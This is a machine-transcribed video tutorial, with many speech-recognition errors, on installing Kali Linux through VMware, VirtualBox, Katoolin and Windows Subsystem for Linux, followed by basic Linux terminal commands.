about this at all.
It usually shows that

and then click on next year.
So it's asking
which operating system

will Be installed
on this virtual machine.
I wanted to be Line-X.
So make sure you select

Linux 64-bit and click
on next you have an option

to name your virtual machine.
Let's say Kali Linux.
And where do I want to store it
in my documents under watching

machines color next sure
and click on next.
It says it already exists.
Let me try this one.
Then let's take our Linux one

and next Yeah,
so basically Your Kali Linux

will need about a 20 GB.
Let's assign some 40 GB are

that's the maximum this size
that you can a lot
while you can a lot more

than that as well.
But minimum it needs about 20 GB

and you have an option
with Stay Store virtual disk as

a single file or multiple files.
Let's just select store

virtual disk as a single file
toward complications
and click on next here.
So as you can see,
you can review your virtual

machine settings here.
You have an option to make

changes to the settings.
You can make changes right now,

or you can do it later.
It as well.
Let's just go ahead

and make changes now.
Click on the customize

Hardware option here.
Well as for the memory

for this virtual machine,
it totally depends
on what you're using

virtual machine for
if you're not using

it for heavy works.
Then you can assign

least amount of memory.
Let's say I want

to assign about 2GB.
There we go.
And as for the processors number
of processors 1 and the number

of core processors,
you can choose as
many as you want.
Let's say to this

will increase the performance
of your virtual machine,
so and again,
Totally depends on whatever

you want to choose and yeah,
we have already attached

the image network adapter you
can set for not USB controller

and sound card.
You can retain

the default settings.
And as for the display click

on accelerated 3D Graphics sense
what color Linux has

a graphical user interface
and it says 768mb is

the recommended amount of memory
that you can use for graphics.
So let's go ahead and select

that and click on close.
Well, you can actually

make all the settings
after installing color index.
As well no problem there.
Once you've done

that click on finish here,
as you can see,

my color Linux image is ready.
For installation.
You have two options to power up
as you can see you have

this option here.
You can click on that to power

on this virtual machine,
or you can go ahead
and click on this.
Let me click on this.
So once you click on that,
you should be greeted

with this Kali boot screen
as you can see,

there are a lot of options here.
We did discuss live

option earlier, right?
So if you don't want
any trace of Kali Linux

on your operating system,
you can go ahead and use

live option here.
You have live
USB persistence mode and live

USB encrypted persistence
as well suppose.
You want to store some data

and save it for later
the boots you can use

live persistent option here
and most of the time

people get confused
with this installing

graphical install.
Just don't go ahead

and click on it.
Style option do it only
if you are well versed

with command line interface.
So basically that install option

is for command line interface.
So you will be greeted with Kali

Linux command line interface
since if you're doing it

if you're using Kali Linux
for the first time go ahead
with graphical installed select

the graphical install
and click enter.
So as you can see,
it will start
mounting storage devices
whole installation process

might take about 10 minutes.
So it's prompting you
to select a language so select

your preferred language,
then you control location.
Let's say English
and click on enter

and it's asking you
for the country location

just give United States
and enter and I want

the keyboard to be configured
with American English.
You can choose

any native language.
Like I said earlier it supports
multilingual or it
supports Get the languages.
So go ahead and choose it,
but it might complicate the way

you use Khalil mix later.
So you can always go ahead

and stick out with English only.
Well, it doesn't matter.
So as you can see

it's configuring the network.
So it will detect the ISO file

and load installation component
and then prompt you to enter

the hostname for your system
while in this installation.
Let's just enter Kali

and click on and off.
You can give the name you want

and next it's asking you
for the domain name suppose.
You have set

up virtual machines.
Jeans, and if you want to give

all of them a domain name,
you can assign

a domain name as well,
but it's optional.
Let's not give any domain name

here and click on enter.
The next thing it does is it

will prompt you for the password
that you'll have to enter every

time you launch your Kali Linux.
So just give some password

of your choice.
And click on continue.
The best thing about callanetics

is you can set up date
and time as well.
You can make it

later as well,
but you can choose it here.
So just click on Eastern

of whichever choice you like
and click on enter.
So the installer will now prob
your disk and offer you

four different choices,
as you can see,
it says guided use entire disk

guided use entire disk
and setup lvm,
which is logical volume

manager same thing,
which is encrypted and manual.
So if you are an expert,
if you already use

this color index
before you can go ahead
and select any of this three

options from the bottom.
That's he'll be a more manual

or encrypted lvm.
Otherwise, you can always
go ahead and choose guided

use entire disk option here
if you are a beginner
and click on enter so This

is the disk partition.
Where'd all the data will be

stored and click on continue.
It's asking if you want

to stores all files
in one partition,
or if you want
to make partitions.
So depending on your needs,
you can go ahead and choose

to keep all your files
in single partition,
which is default or you

have separate partition
for one or more

of the top-level directories.
Let's just choose
the first option
and click on enter.
So once you've done

that you'll have
one last chance to review

our disk configuration.
Once you're sure
that you've given correct

details click on enter here.
It's asking if the changes

that you make to Kali Linux
should be written
to the disk or not.
So say yes.
So we did start partition

and install the washing machine.
It took a while but
as you can see installation

is almost done.
It's asking me to configure

the package manager.
Well, if you select

no in the session,
you will not be able

to install packages
from Cali repositories later

and click on continue.
So suppose if you want

to install other repositories
or updates later on you

can always go and click on yes.
Otherwise, it's always otherwise

you can go for know as well.
Now it's going to configure

the package manager
will install package manager

and configure it then it
will install GRUB boot loader.
And it's asking
if you want to install GRUB boot

loader to master boot record.
Definitely.
Yes so select.
Yes and click on continue.
So it's asking to select

the device manually.
You can click

the select the device.
So yeah, guys we're done here.
So you can finally click
on continue option to reboot

your new color installation.
So as you can see
the entire process took

about 10 to 11 minutes.
So yeah, let's go ahead

and click on continue here.
It's gonna finish

the installation.
So guys as you can see

the installation process
from the step where we

select the language
till the last step is same.
It's just the medium on which

you are installing is different
for example, right now.
We use VMware later on.
I'll show you

how to use virtualbox.
But once you color Linux image

is ready to boot the rest
of the installation process
is similar to this.
So it's finished installing.
It's loading the image.
So if you have done
everything right during

the installation process
and according to
your needs your land up
in this page use a name.
So we've given
at this Scully right kli
and password as you can see

it showing an error.
It says the didn't work.
Please try again.
This is mostly
because if first time
when you log in you
should use word root as

your default username.
But later on
once you have already logged

in you can change the username
according to your need so root
and password you can use

the same password
which you set

during installation.
In process so as you
can see login is successful
and here I go my Kali

Linux is up and running
so I can start using cullinan X

according to my needs.
So once you've done

that you can go ahead
and install VMware tools
so that you can maximize it

full screen and all that stuff.
You can also go ahead

and change the date
and time settings.
As you can see here can go

for the settings option here
and do the settings
and you can start using
Color Linux for hacking and

penetration testing purposes.
So it's as easy as that guys.
So please Please go
ahead and try installing it.
Well, if you find any errors

during installation process,
let us know
in the comment session.
We'll get back to you

as soon as possible.
Now.
Let's move on
to our second demo.
Now.
We'll see how to launch Cullen X
on Mac operating system using

virtualbox in the previous demo.
We use VMware and now

we'll be using virtualbox.
But actually I'm not using

any Mac system here
operating system,
but I'll show you

how to install using virtualbox.
The procedure is very similar.

So all you have to do is
on your Mac operating system.
Go ahead and click a

for Should box download.
So this is the
virtualbox official page.
You can go ahead and click

on downloads here.
As you can see you have

different options here.
It says windows
for Windows operating system

OS X host line X and solar host
since if you're using

Windows then go ahead
and select Windows host.
But as for Mark,

you'll have to select this.
It's mostly a DOT exe file.
Once you've done

that you can install virtualbox.
It's just click

on next next next
and it will walk out
and provide settings

according to your need.
I already have
installed virtualbox.
It's the next thing

you do is similar as
what you've done with VMware.
Go ahead and download

official Kali Linux image.
Make sure you don't download

any duplicate versions
of ISO file from other websites.
Make sure you download it

from original website.
If you want to do it
from the beginning
go ahead and install

ISO file your torrent
or you can just go ahead
and download just the image

for Wii virtual box here
for 64 bit and you have option

for 32-bit as well.
I've already done that.
So let me open my Virtual box.
Yeah artists the procedure

for VMware and watch
the box is almost seen

just slight difference.
Let me maximize
the screen for you guys
as you can see I already have
and watching machine

launched up here.
I haven't powered it up yet.
Anyway, I'll show you

how to install new one.
Just click on new' option here.
This is your
virtualbox homepage guys.
So click on New Year

and just give a name.
We've already given
color Linux all you're right

for the virtual machine.
So let's give it
some of the name.
Let's say capital K L line.
Unix and choose the type

of operating system
that's line X and here 64-bit -
64-bit according to
your operating system needs you
can go ahead and choose it 32
but as well click

on next and again,
like I said earlier
depending on what you're doing

on color Linux operating system
or virtual machine you go ahead

and design the memory
since I'm just showing you
how to install I'm not assigning

much memory you have.
So let's just retain

the default ones it to 4mb.
That's 1 GB and click on next
and it's asking you have

a three options here.
Of not to add virtual artists

create virtual orders now
and you can go ahead and add

a virtual hard disk,
you use an external

virtual hard disk.
Go ahead and select

the second option click
on create and use

virtualbox image.
Like I said earlier

we downloaded ISO image,
right and it's an ISO file

with extension dot
is oh, so basically it's nothing

but image so click on next
and I want to the storage
on physical hard disk

to be assigned dynamically
and click on next.
So this is the name

of the virtual machine
which we just gave all your

it's asking you to choose
the path wherever you want

to store your virtual machine.
Let's say documents
and watching machines click

on open and save
so that's the part of setup.
And as for the memory call
you always needs you

to assign at least 20 GB.
So let's go ahead
and give 20 GB you

can always assign more than that
and click on create.
So this is the one we

just created right?
It's ready.
Just click on settings

before you power up.
You'll have to make

certain settings.
So if you want to change name
or type and version

you can always go ahead
and do that here.
We don't have anything

in advance is just the folder
where your virtual machine

with this Toad go for systems.
We won't be using
any floppy disk are so right.
So on ticket or uncheck it and
yeah, this is memory
if you want to go ahead

and change or assign more memory
because the performance
of your virtual machine

is not that great.
It you can go ahead and do

that for the process
of make sure you enable

this extended features.
So basically if you want

to increase the performance
of your virtual
machine the number
of processors you assign

should increase Well for now
since I'm to show you
how to install and just going

to assign one you have option
to increase to say to like that.
And as for the display,
you can enable 3D acceleration

display storage settings.
This is the most

important one right now.
We don't have any image attached

to your so click on this empty
and click on the CD image
that you see here

and choose watch.
And attach the image or die.
So Fire torrent file,
which you just downloaded

click on open and audio
no settings default
Network by default.
You can always set it for Nat
since we're using only one

watching machine ha but
if you want to use a cuddle in X

with any other motion machine
like Metasploit able to you can

go ahead and use this host-only
adapter option here

because when you use Nat
and when you have

two virtual machines,
both of them will be assigned

with same IP address,
which will definitely a problem.
L'm because both
of these virtual machines

need to interact right?
So, yeah.
Well, I'm just saying all

this video information
so you can go ahead

and click on host-only adapter
if you using 2 virtual machines
and you want them

to interact as for now,
I'm just retaining

it Nat and rest
you can you don't have to make

any changes and click on OK
once you've made all

the settings click
on this or you can go ahead

and click on start option.
Are you can light click

on it and start Again,
like I said,
the installation process from

Step One is very similar to that
whether using VMware.
So again, you'll be greeted

with Kali boot screen and you
have multiple options again.
I'm not repeating

the entire thing here.
So go ahead and click

on graphical install.
And if you're a pro

and using command line,
you can always go

for install option.
And if you want to just use it

for one time purpose,
you can always go

for live option here.
That's all guys.
I'm sure you can catch

it from here, right?
Because it's almost similar

to the ones we did using VMware
if you have Here are just go

back and take a look at it.
Yeah, well, like I said,
I showed you on how to use

virtualbox to install Kali Linux
on Windows operating system.
Well, let's aim

for the Mac as well.
You just have to download your

stuff there instead of Windows.
You have another option

with this operating system.
You can dual boot

your color Linux
with Windows or Mac.

It's not as easy as
these installation process
because it will involve

you setting the BIOS to changes
that you get to see
when you power up

your computer initially.
Make sure you refer to color

Linux official documentation
and make sure you've done

the installation properly
so that you won't mess

up your default settings.
So guys we are done

with two ways
of installing Kali Linux one

on Windows and one on Mac.
We saw how to install it using

VMware as well as virtual box
in the third part will see
how to install Kali tools

on any Linux distribution.
It could be Ubuntu Fedora

peppermint operating system
or any other version

or distribution of Linux.
The procedure is
actually similar in
every Linux distribution.
So if you follow up
on one Linux distribution,
you can go ahead and do it
on the Linux distribution

of your choice or the one
that you use One thing

you should remember is
that Kali Linux is not for

the Dai Li line X purposes.
Well, it's only
for ethical hacking
or web application penetration

testing for these purposes.
So guys will be using

a tool called Catalan.
Let me spell it for you guys.
It's Ka T WL iron.
So let's just search for that.
There we go.
It's a script that helps you

to install Kali Linux tools
on your Linux distribution

of your choice.
So it's usually
the GitHub script.
So click on the first link

that you find.
So for those of you
who like to use penetration

testing tools provided by
Kali Linux development team.
You can effectively do
that on your preferred Linux

distribution using this tool
which is Catalan
or Ka t oo a lion.
So as you can see once you've

installed Catalan properly
on your operating system,
you should be greeted

with this page.
I'll show you how to do that.
What about it?
So the purpose of asking you
to see this page is to take

a look at prerequisite hours.
So first thing you need

to have a python of version
2.7 or above installed

in your operating system
and you need a line

exists efficient system.
It could be Ubuntu
or it could be Fedora
or peppermint any other

planets distribution.
I have a bun to here.
I'll be using
VMware Workstation Pro.
It's already open but let

me just go back.
All you have to do is

search for one, too.
And click on the first link.
So as you can see there are

a lot of options yet
for to install a bin

to just click on this
and you'll be able

to download a file ISO image.
I've already done that.
I'm not doing it again.
Let's go back
to VMware Workstation
as you can see.
I already have my Ubuntu

operating system installed
installing a window is
it's very straightforward.
So just take a look

at the instructions
that you need to know when

you're installing Ubuntu once
you've done the installation,
which should look

something like this.
So let me power up.
I've been to operating system.
So as you can see,
once you install your land up

on this page and it's asking
for the password you

set up this username
and password during

the installation process.
So don't worry about it.
Click on enter.
So let's say you are

a Unix lover you
like using your next platform.
But right now you want to use
certain tools for performing

application penetration,
testing and ethical hacking.
You just don't need

all the tools.
You need few Tools
in that case instead of

installing color index
on your operating system

installing only certain
color Linux tools will be

The best option right for that.
Like I said earlier

will be using cut Olin.
I have a set
of four five commands
that you need to use

to install Catalan Festival.
You need to have get
on your operating system.
Let me check
if I have it or not.
Anyway, I have these five

or four set of commands
which will be using

I'm going to attach them
in the description below.
So if you want you can use them
as you can see install

get First Command.
It says unable to use it
because have to login

as a root user.
So let me just it's asking

for the password.
Yeah now I'm a root user.
So let me try the command again.
That's apt-get install Kit.
Yeah installing get it's just

going to take few minutes.
But while this is happening,
let's go ahead
and explore cartoon
to let me go for Firefox here.
Let's search for Carter:
so it's the first link guys

like I said earlier,
so let me scroll down
as we saw the should be

the home page
and we did take a look

at the requirements.
So let's just go back and see

if it's done.
It's still happening.
So one thing is make

sure you have a python
or version 2.7 or above.
Otherwise the entire thing

won't work at all.
Yeah guys it's done.
Now.
We are done with the first step.
We need to install a we need

to clone the cartel in right?
So what you do?
Like I said,
I have a command right

here just copy this
and place it over

there control C.
Let's go back to terminal and it

makes your skin for you guys.
Yeah.
And based so basically

I'm cloning it here
and the next command is

I'm copying the python file
to this directory and click on
until it's done.
It's just quick process now,

we'll have to change permissions
so that we have access

to use Catalan for that.
Basically.
We are giving
execute permission.
So chmod plus X. Make sure

you take a look at that +
x + enter we are audio
is now our cut line
is installed say a lion,
so as you can see It's
already the first thing

that you should do is
before you upgrade

your system essays.
Please remove all the color

like repositories to avoid
any kind of problems.
So as you can see it shows

you like five options here.
First one is
Azad Kali repositories
and update next view categories.
Like I said,
Kali Linux is 600

plus tools, right?
So you have different

tools categorized
under different headings.
Then you have

classic menu indicator.
It's nothing here

as you can see.
I have a small icon here.
If you click on that,
it'll just show

you different menus.
That's all and if you

want to install color menu
for easy access you

can do that as well.
So let me just click one

under one that says add
color Linux repositories update

remove and view all kundan's.
So let's try removing them.
Let's drive with

adding repositories.
It is there are certain

duplicate signatures removed
and all that.
So let's just try to remove
like they suggested earlier

have been deleted now one.
So if you guys want to go ahead
and update the repositories

already existing ones,
you can go ahead and do that.
I'm not doing it now
because it's going

to take a while.
So if you want to go
back just click back.
It's as easy as that.
Now, let's say I want

to view categories
and install one to love it

as you can see.
There are like number

of fusion number
of categories here.
So I have web application

penetration tools your
have password attacks.
I have exploitation tools.
Well, if you are interested,
there's an introduction video

of what is Kali Linux
by director in the south.

Security playlist.
So go ahead and take

a look at that.
We have explained
like about five to six popular

tools in Kali Linux.
Anyway getting back

to today's session.
Let me just say for
as you can see it lists all

the web application tools.
So if I want to install
all those there's an option
that's zero, but let's

just say I want an install
a tool called SQL map.
I'm sure you might

have heard SQL map.
If not, it's okay.
It's a tool which you

use for checking out
vulnerabilities at a present
an application database system.
So anyway, it asks
inside the number of the tool
that you want to install.
Let's say 27.
So as you can
see it's installing.
So it's as if you said guys so

once you just done installing,
I'll get back to you.
Any tool I just

showed you how to use
how to install SQL map
which is there
in web application tools.
You can go ahead and do
that for other different types

of tools as well suppose.
You want to install

all the tools.
You can go forward 0 as

in click on zero option.
So there you go guys.
I just showed you

how to install one tool
so you can go ahead and do

that for any kind of stool
under any category.
So if you just want

to go back click pack
and go for other types of tools,
let's say eight there you can

see so whatever different time
of exploration tools you

want you can go ahead
and install them.
Let me just click back
and the back sometimes when you

try to install all the tools,
you might get an error saying
that's the file doesn't exist

or depository doesn't exist.
All you have to do is go

for one First Option here.
As you can see here

you have option two
which is update.
So update your repositories.
Make sure the Kali Linux mirror
which is present for

the updation as the right one.
Once I've done
that you won't get any errors.
All the tools will

be installed properly.
So suppose you want to get

back from these cattle
and easy just press control C.
And yeah as you can see

it says goodbye.
So that's as easy as it is to
use colonics tools on any kind
of Linux distribution
while I've showed you on a bun

to the procedure is same
on any other Linux

distribution guys.
So there we go guys.
I've done with

three things first.
We did on Windows
using VMware then
on Mac using virtualbox

and third I showed you
how to install Kali

Linux tools on any kind
of Linux distribution.
And finally, there's

one last demo here.
We'll see how to

install Kali Linux
or Windows operating system

using Windows subsystem
for Linux feature.
So, let me get back

to my operating system.
We won't be needing
VMware Workstation anymore.
So guys will be using
a feature called
windows subsystem for Linux,
which is By default present

in all the current versions
of Windows 10.
This is actually for those
who prefer using Color Linux

command line interface.
So make sure to listen

to me properly.
Oh use this option only
if you are a pro in using

command line interface
or if you have any experience

using command line interface.
Otherwise just go ahead and use

VMware watch the box
and install Kali Linux graphical

user interface option.
So yeah, this windows subsystem
for line X allows you to run

Linux distributions as subsystem
on your Windows
operating system this
Her is really a new feature.
It exists only in Windows 10.
So you need to use

latest version of Windows
10 to perform this demo

or use this option.
And in addition to that.
We also have
other prerequisites,
especially we need
to have git installed
or you can go ahead

and zip the file
which is Windows subsystem

for Linux files normally
but having it is
also a nice day.
Secondly, you need

to have python
of version 3 or above make sure

you've installed Python and set
up the path to check
if your python is installed

properly or not just sake.
Go via command prompt

and just type a python version.
It should show
you wasn't properly only

then you can be sure
that your python

is properly installed.
As you can see for made showing

three point six point seven,
which is definitely above three,
and it's properly installed

in the path is set.
The first thing you

need to do is enable WSL
or Windows subsystem for Linux.
Just go for the control panel

and there click on programs
and turn Windows features
on or off make sure

not to touch any other features.
It might mess up
your operating system.
So scroll down.
It's usually at the bottom.
Bye.
For let's never nibbled a few
using it for the first time you

need to enable it.
So first thing you

do is enable it
as you can see here.
It says windows
subsystem for Linux.
Make sure you enable it check

mark it and click on OK.
Once you have done

that run your command prompt
or terminal as an administrator.

right-click on it and click
on run as administrator.
And yes now will be

enabling based distribution.
That is like I said windows

subsystem for Linux allows
you to run a line X

distribution as subsystem.
Right, but for that

we need to enable
this base distribution for that.
You need to install

the base distribution
or any kind of Linux

distribution that you need.
So just use LX run and install.
So once you type
that this is the output

which you get it says,
it's the Legacy Windows system

for Linux distribution.
So you can go ahead and install

other Linux distribution
which are available
in Microsoft store.
But unfortunately Kali Linux

is not available,
but it doesn't matter right.
We're anyway installing

it using the procedure.
Just click on why

here saying yes,
I've already installed.
So it's showing
Legacy Windows system
for Linux distribution

is already installed
on my system for you.
It might take a while

after installing.
The most important

thing is it lasts
for you to set up a password
and username don't skip

that step wait for a while
and make sure you set

up the password and use
an improperly only then

entire thing will work out
once you've done

that we are done here.
You can close

the command prompt.
The next thing you need

to do is install git
I already have it installed.
It's very easy install

dot exe file and click
on installation process.
It's very straightforward

and open git bash.
Yeah before that.
Let me go ahead and create

a folder called text here.
And as you can see it stored

on my desktop right now,
it's empty.
Anyway, let me go back

to get here and CD desktop
TST all your Venable

windows subsystem for Linux.
But now we have to download

the script right for that.
Search for Windows subsystem

for Linux Witcher.
And the first link is

the GitHub link click on that.
There you go guys.
It says windows subsystem

for Linux distributions,
which are it is the purpose

is to let you easily download
and install Linux distribution
as subsystem on your
Windows operating system.
So as you can see you have

different options here
for the base operating systems.
So yeah copy this link

here control see see
and go back to git git clone
and paste the link which you

just download it paste it.
It shouldn't take very long.
It's done guys.
So now if your check

your test folder
Windows subsystem for Linux
will be downloaded properly.
Let's just go back and check

that here is our test folder
as you can see windows subsystem

for Linux is already there
now open your command prompt.
CD let's go for the text file.
And if you search
for the directories under

that you can see WSL here.
Now, let's go for that as well.
You can just press stop

directories under that
so as you can see the two things

the most important things is
this get pre-built dot p y
and install py
this KET pre-build py will fetch

Kali Linux Docker files
and installed our py

will install Kali Linux for you.
But I'll just show you

how to do it.
So go back to the browser

and type talk a file.
Click on the second link.
I just wanted few
to copy the command easily

so that you won't make mistakes.
This is the one
which you'll have

to copy to fetch
the color index dog of files.

So you can just copy this part
and go for command prompt.
Let me maximize this for

you here you can say so
if you remember I said

python is masked.
So make sure you install
it properly and set

up the path White.
And get pre-built.
Let me just people dot

pi and copy it.
As you can see it's installing.
It's going to take

probably like 2 minutes.
So it says it's done
at says it's safe to this file

in the text folder.
Let's go back and check

if that's happened.
Here's a test folder

under WSL you have python
as you can see you

have python folder.
Is it folder
of Kali Linux installed
or fetched you'll have

to install it now,
right?
So let me now just type python.
This is the command

that you want to use
that's installed on pie

and stalled out pie
and copy this or just type

and enter tab lutefisk stabbed
and click enter.

So as you can see
it took a while
but it did install right now.

it's installed so you
can close the CMD and open

your command prompt and run it
as an administrator click.
Yes.
Let me maximize the screen

you'll have to set
the root password are

the default user as brute so
set default the command
that you need to use

hit default user as root.
As you can see it's now set

to root and click Bash.
Done guys, right now.
We are running
on Callie operating system

on command line interface
if want to make sure
if you're actually running

on Curry just type
Cat ATC and issue.
It shows that
Kali Linux rolling.
So as you can see we
have successfully installed Kali

or how to use command line

interface on Windows using

and I'm telling it to you again
just use it if you know

how to use command line
interface very properly.
Otherwise Might be
a little overwhelming
subpoenas the fault.
It's the command that you need

to use hit default user as
root as you can see.
It's now set to root

and click Bash.
Done guys, right now.
We are running
on Callie operating system

on command line interface
if want to make sure
if you're actually running

on Curry just type Cat ATC
and issue its shows

that Kali Linux rolling.
So as you can see we
have successfully installed Kali

or how to use command line

interface on Windows using

and I'm telling it to you again
just use it if you know
how to use command line

interface very properly.
Otherwise It might be a little

overwhelming for beginners.
So now it's time
that we go through
the command line basics
of any Linux terminal.
Now, the Linux terminal

is a very powerful tool.
It allows you to move around
the whole operating system
through the files and folders.
It allows you to create files.
She's their permissions change
how they behave
and a bunch of other things you

can do filtering you can grab
stuff the specific stuff

from a specific file
and there's a bunch

of interesting thing
that you can do
and as an ethical hacker

you will be working
with Knox distribution

most of the time
whether it may be Kali Linux
or some other thing

like Peridot s
but you will be working

on enough most of the time
because it's a powerful tool

for networking analysis
and scanning and

all sorts of stuff
that you want to do

as an ethical hacker.
So the First Essential step

is to actually know
how to use the tool
that is available to you

and that is out here,
which is the terminal now
as I'm running this

on a virtual machine,
you might find it
that my execution times

a much slower and that is
because I I have
a very very slow laptop
because my virtual machine

is actually eating up a lot
of my Ram and I have a bunch

of other processes
that are also rendering
I do this on my free time.
So let's go ahead and go

through the commands
that we are going

to actually go through now.
Let me actually make

a list of commands
that I want to teach you guys.
So let me see
if leafpad is available
firstly leafpad is
basically a text editor.
So the first come on
that we're going

to start off with is CD.
CD stands for change directory

now at this moment.
We are in the root directory
as you guys can see we can print

the current working directory
with the single PWD and that is

a current working directory
as you see it's called route
and suppose we want to change

directory to the home directory.
So all you have to do

is CD which stands
for change directory
as I just said
and specify the part.
No CD / home.
Okay.
So once we're in home,
I want to make
a list of commands
that are used on the CLI

that I want to teach you guys.
Guys, so what would I do

I would firstly see
if any files are available

that I can edit.
Okay, so these files
are available, but let's create

a new file for ourselves.
So firstly let's do
Nano list dot txt.
Now.
What Nano does is

now we'll open up
a small command line text editor
now come online text editors
are very much used

by ethical hackers
because they save

a bunch of time
if there's always switching

between GUI and command-line
because you'll be doing a bunch

of stuff on the command line
and Will you want to write

something you're always
switching to gooey?
It's a waste of time

and you want to see
if I'm as an ethical hacker.
So you can use this thing

called a command line editor
and it can basically do most of

the stuff a GUI editor would do.
Now you say Nano

and the name of this file.
So now basically
has created this file now
and it has opened up

this new fresh window,
which overrides the command line
that we were in The Bash

and this is a place
where you can actually edit
what goes in the file

now, let's see.
See the list of commands

that I'm going to teach you.
I'm going to teach you LS LS

will be the list of files.
We did CD.
We saw a PWD.
So that was a print working

directory will be looking at
how you can copy stuff

at the CP command.
Then we will be looking at MV
which is basically move then

we will be looking at cap.
And that's an interesting one
and also less which is

another interesting thing
and we'll be looking at grep
which is actually
used for graphing
or grabbing things from files
that You might want

to see you'll see
what I mean and a short
while we will see echo which

probably does what you think.
If you have any experience

with the Linux,
then we'll be doing touch
and we'll be doing make

their which is make directory
and then we'll do

in ch own chmod
then all the most

dangerous commands has RM
and then you can do man.
Let's help.
Okay.
So these are
the list of commands
that we are going to go through
in this As part of the video so

suppose I was making this video
and I want to
save the somewhere.
So you see down here.
There are a bunch of options

that are sure to you.
Now this cat it sign

might be not really thinking
that the shift 6

1 it's not shift 6:00.
It's actually a controlled

so cat it is controlled
and then G of course means G.
So if you go Control G,
it will actually get help.
Now.
What we want to do
is save the file
and that is control.
Oh and that is right out.
So what we want
to Who is a control?
Oh, and now it's going to say
if we want to name
the file list at the XD
and we want to name

the file and it says
that we have written

down 15 lines.
So that's how you save a file.
Now.
All you want to do

is exit out of you.
Okay.
So first let's go LS and let's

go through whatever there is.
So LS showed us the list

of files that are there
in that directory.
Now Alice can also

show you the list
of files in a directory.
Curry with the paths
that you specify

likewise ALS VAR.
It'll show me everything

that is involved.
Okay, there are a lot

of interesting things like bar.
So let's head over twice CD /

bar and you hit enter
and now we are

in the folder bar.
So now to actually demonstrate
how powerful analysis we have

a few Flags now to see the flags
of any command you

can just do - -
help universally throughout

the Unix one line so out here
you see some information
that is Stuff to read

but if you go on top
and scroll out here,
you'll see all the flags
that you can use

with the command.
That is LS and
how you can use them
so you can see
what you use and you can read

a little bit about it.
So if you use all it ignores

entries starting with DOT,
so suppose we were to do LS
in why let's see so

it shows us like this now
if you do LSL,
it'll show a long list

with more information.
So these are the permissions

Options that you see out here
we will be seeing
how we can change
the permissions of a file

soon enough and this is
who owns the file the user
and the user group

is the file number.
I guess.
I'm not sure which is
when the created the name

of the file is the time
when the file was

created, I guess.
Okay.
So that's how you get

very detailed information
about all the files now.
That's another thing you

might want to use with ALS
and that is the 8X

so you can go LS
a and it will show you all.
Of the hidden files also.
So now you see some two files

that were not shown out here.
Our file is begins from backup.
But when we do LS, / I mean -
La we see two more files

at this Dot and Dot so let's see
if we can move into that CD dot

so we can't even move into that.
So that's interesting.
So these are hidden files.
So these are not seen

two random users
and we can actually

do stuff with them.
We will see how we

can use hidden.
Hours later on.

So if you want to show
hidden files through LSU,
all you have to do is LS and -

La so that was all about LS.
So let's move back to /home

where our list of commands
that I want to show you

always so silly home.
Let's Alas and see

what was it called,
its called list and suppose.
I want to see the condensed

of list or txt.
All I have to do
is say list dot txt.
Now.
It shows us whatever
this file is containing.
It will read it out for you.
Done CD we've done LS
and its various forms
we've done PWD now it's time

to do CP CP is basically used
for copying files from one place

to another so suppose.
I want to copy this address file
that is there into

some other directory.
Let's save our so all I would

have to do is CP name Dot txt.
And then you specify

which location you want
to actually copy it
to so CD / VAR.
So this is where I want to copy

my file to and you hit enter
and it's Copied but

that was a very small file now.
We can actually check

if it was copied
before I move on and pour

some more knowledge into you.
So let's go into VAR.
So CD / VAR hit enter

and you're involved again
and you CLS and now

you see a name dot txt.
So let's remove
name dot exe from here
because I want to copy

it again and show y'all
a difference between a flag

that I'm going to use right now.
So the -
and letters that you

use are called flag.
Technically in the
Linux terminal RG.
So let's go back to home now

instead of the name of the file
and moving back home.
Just like I did you can type
out the complete name

of the file out here.
So you could have gone

CD slash home slash name
Dot txt and copy to slash bar.
But this time
what we're going to do is

we're going to use a hyphen V,
which is basically used
for a verbose output

of whatever you're doing.
So most of the commands

that we're going
to using will have a -
V with them.
So, let's see how this

actually affects the output.
So what we're going to do

is we want to copy so sleepy
and verbose and we want

to copy the file name Dot txt.
And we want to copy it

to the folder called VAR, right?
So now you'll see
that it will give us

what is being moved rather
that is named Dot txt.
And where it is being moved

to so this is a very good way
of knowing what is
actually happening because
if you do it without the verbose

And suppose name not the XD was
just 20 GB file
and you just don't know
if it has finished or not.
So if it's a 20 GB file
that is continuously update you

on where what is being copied.
So basically all you

have to do is type -
V if you want to know
where your files being copied

and the exact part.
Okay, so that was about

how you can copy files
from here and there now,
what was the next command

that we want to see so cat.
So, let me just go and see
the next command
that is there so list at the XT
so after God I want

to show less Okay.
So we've done CP we
also have to do MV.
that CP is basically
a copy copy is
as you would expect it leaves

a copy of the file that
in the original directory
while also maintaining

a copy in the directory
that you specified.
But if you want to move

the file completely,
all you would have to do

is use the command MV.
So MV is for moving
the file now,
let's see what all goes with MV
so you can type help
and as I said you get

the verbose option
And you get suffixes

you can force things
to happen to suppose.
You don't have the permission do

not problem before overwriting.
So it'll give you a prompt

and you can completely
overlooked the problem

with the F thing.

how that looks like.
We'll be doing a verbose
and we will be coughing the

address dot txt file and okay.
So every time I've

been actually typing
so you can do address

or txt by just pressing Tab
and it will auto complete

so address or txt to / -
bar now, it will show you
that it is actually renamed

addressed at the XD
to VAR dress dot txt.
Now.
If you go and do LS
out here you will see
that address dot txt is

not actually he go
but if we were
to move to VAR,
so CD / far, okay.
I've also been

typing out commands
that have been previously using
and you can simply toggle

through all the commands
that you've used by

the up and down keys.
So LS MV MV V help I did CD home
and I have to go through all

this just to prove a point.
It's a seedy bar.
We want to change that now.
We're in the variable folder.
And we also want to see

what we have out here.
So address should be
out here and Alas and
as you guys can see addressed

at the XT is the first file
that has come up and it

is basically the same file
and it can prove that to you

by just getting the file
and as address txt.
And you see
that is some random address

for some random person.
Okay now, Let's quickly clear

out a file or window.
You can do that

with the control l
or you can just type or clear.
Now.
What we want to do
is move back to home.
So yeah
City home.
Okay.
So now that we're

back at home again.
Let's get out our next file.
So let's start the XT
and after move I wanted to go

through cap now cat
as you guys can see is printing

out the contents of a file
and there's also less
which does something

very similar to cat.
So, let's see what it does.

So if you go less
and you list.txt you actually

see the contents of the file
in a completely new window,
which overlays on
the previous window
and this is a very neat way

to actually see the contents
of a file which is true less.
If you want to keep

your main command line interface
not so cluttered which cat

clatters it completely.
So if you want to get out

of this place this less place
and all you have

to do is press q
and Q gets you back and
as you see nothing was printed

out on our main interface.
So this is a very
cool way to actually keep
your command line interface neat

and tidy when you're doing work.
Okay, so crap,
so grab is used for actually

filtering out stuff from file.
So suppose we want to see
whether a command has

some verbose option
to it or not.
So now I know
that MV has a purpose command

but suppose I didn't know
that so MV - - helped then

you use the pipe sign.
So what the pipes Means

is you have to take
this command the First Command
and then you five nine and two

the second come on
